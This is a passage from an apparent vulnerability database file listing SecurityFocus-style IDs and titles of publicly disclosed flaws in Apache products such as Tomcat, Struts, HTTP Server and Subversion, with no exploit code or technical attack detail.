14907| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
14908| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
14909| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
14910| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
14911| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
14912| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
14913| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
14914| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
14915| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
14916| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
14917| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
14918| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
14919| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
14920| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
14921| [64780] Apache CloudStack Unauthorized Access Vulnerability
14922| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
14923| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
14924| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
14925| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
14926| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
14927| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
14928| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
14929| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
14930| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
14931| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
14932| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
14933| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14934| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
14935| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
14936| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
14937| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
14938| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
14939| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
14940| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
14941| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
14942| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
14943| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
14944| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
14945| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
14946| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
14947| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
14948| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
14949| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
14950| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
14951| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
14952| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
14953| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
14954| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
14955| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
14956| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
14957| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
14958| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
14959| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
14960| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
14961| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
14962| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
14963| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
14964| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
14965| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
14966| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
14967| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
14968| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
14969| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
14970| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
14971| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
14972| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
14973| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
14974| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
14975| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
14976| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
14977| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
14978| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
14979| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
14980| [59670] Apache VCL Multiple Input Validation Vulnerabilities
14981| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
14982| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
14983| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
14984| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
14985| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
14986| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
14987| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
14988| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
14989| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
14990| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
14991| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
14992| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
14993| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
14994| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
14995| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
14996| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
14997| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
14998| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
14999| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
15000| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
15001| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
15002| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
15003| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
15004| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
15005| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
15006| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
15007| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
15008| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
15009| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
15010| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
15011| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
15012| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
15013| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
15014| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
15015| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
15016| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
15017| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
15018| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
15019| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
15020| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
15021| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
15022| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
15023| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
15024| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
15025| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
15026| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
15027| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
15028| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
15029| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
15030| [54798] Apache Libcloud Man In The Middle Vulnerability
15031| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
15032| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
15033| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
15034| [54189] Apache Roller Cross Site Request Forgery Vulnerability
15035| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
15036| [53880] Apache CXF Child Policies Security Bypass Vulnerability
15037| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
15038| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
15039| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
15040| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
15041| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
15042| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
15043| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
15044| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15045| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
15046| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
15047| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
15048| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
15049| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
15050| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
15051| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
15052| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
15053| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
15054| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
15055| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
15056| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
15057| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
15058| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15059| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
15060| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
15061| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
15062| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
15063| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
15064| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
15065| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
15066| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15067| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
15068| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
15069| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
15070| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
15071| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
15072| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15073| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
15074| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
15075| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15076| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
15077| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
15078| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
15079| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
15080| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
15081| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
15082| [49290] Apache Wicket Cross Site Scripting Vulnerability
15083| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
15084| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
15085| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
15086| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
15087| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
15088| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
15089| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
15090| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
15091| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
15092| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
15093| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
15094| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
15095| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
15096| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
15097| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
15098| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
15099| [46953] Apache MPM-ITK Module Security Weakness
15100| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
15101| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
15102| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
15103| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
15104| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
15105| [46166] Apache Tomcat JVM Denial of Service Vulnerability
15106| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
15107| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15108| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
15109| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
15110| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
15111| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
15112| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
15113| [44616] Apache Shiro Directory Traversal Vulnerability
15114| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
15115| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
15116| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
15117| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
15118| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
15119| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15120| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
15121| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
15122| [42492] Apache CXF XML DTD Processing Security Vulnerability
15123| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
15124| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15125| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15126| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
15127| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
15128| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15129| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
15130| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
15131| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
15132| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15133| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15134| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
15135| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
15136| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
15137| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
15138| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
15139| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
15140| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
15141| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
15142| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
15143| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
15144| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
15145| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
15146| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
15147| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
15148| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
15149| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
15150| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
15151| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
15152| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
15153| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15154| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
15155| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
15156| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
15157| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
15158| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
15159| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
15160| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
15161| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
15162| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
15163| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
15164| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15165| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
15166| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
15167| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
15168| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
15169| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
15170| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
15171| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
15172| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15173| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
15174| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
15175| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15176| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
15177| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
15178| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
15179| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
15180| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
15181| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
15182| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
15183| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
15184| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
15185| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
15186| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
15187| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
15188| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
15189| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
15190| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
15191| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
15192| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
15193| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15194| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
15195| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
15196| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
15197| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
15198| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
15199| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
15200| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
15201| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
15202| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
15203| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
15204| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
15205| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
15206| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
15207| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
15208| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
15209| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
15210| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
15211| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
15212| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
15213| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
15214| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
15215| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
15216| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
15217| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
15218| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
15219| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
15220| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
15221| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
15222| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
15223| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
15224| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
15225| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
15226| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
15227| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
15228| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
15229| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
15230| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
15231| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
15232| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
15233| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
15234| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
15235| [20527] Apache Mod_TCL Remote Format String Vulnerability
15236| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
15237| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
15238| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
15239| [19106] Apache Tomcat Information Disclosure Vulnerability
15240| [18138] Apache James SMTP Denial Of Service Vulnerability
15241| [17342] Apache Struts Multiple Remote Vulnerabilities
15242| [17095] Apache Log4Net Denial Of Service Vulnerability
15243| [16916] Apache mod_python FileSession Code Execution Vulnerability
15244| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
15245| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
15246| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
15247| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
15248| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
15249| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
15250| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
15251| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
15252| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
15253| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
15254| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
15255| [15177] PHP Apache 2 Local Denial of Service Vulnerability
15256| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
15257| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
15258| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
15259| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
15260| [14106] Apache HTTP Request Smuggling Vulnerability
15261| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
15262| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
15263| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
15264| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
15265| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
15266| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
15267| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
15268| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
15269| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
15270| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
15271| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
15272| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
15273| [11471] Apache mod_include Local Buffer Overflow Vulnerability
15274| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
15275| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
15276| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
15277| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
15278| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15279| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
15280| [11094] Apache mod_ssl Denial Of Service Vulnerability
15281| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
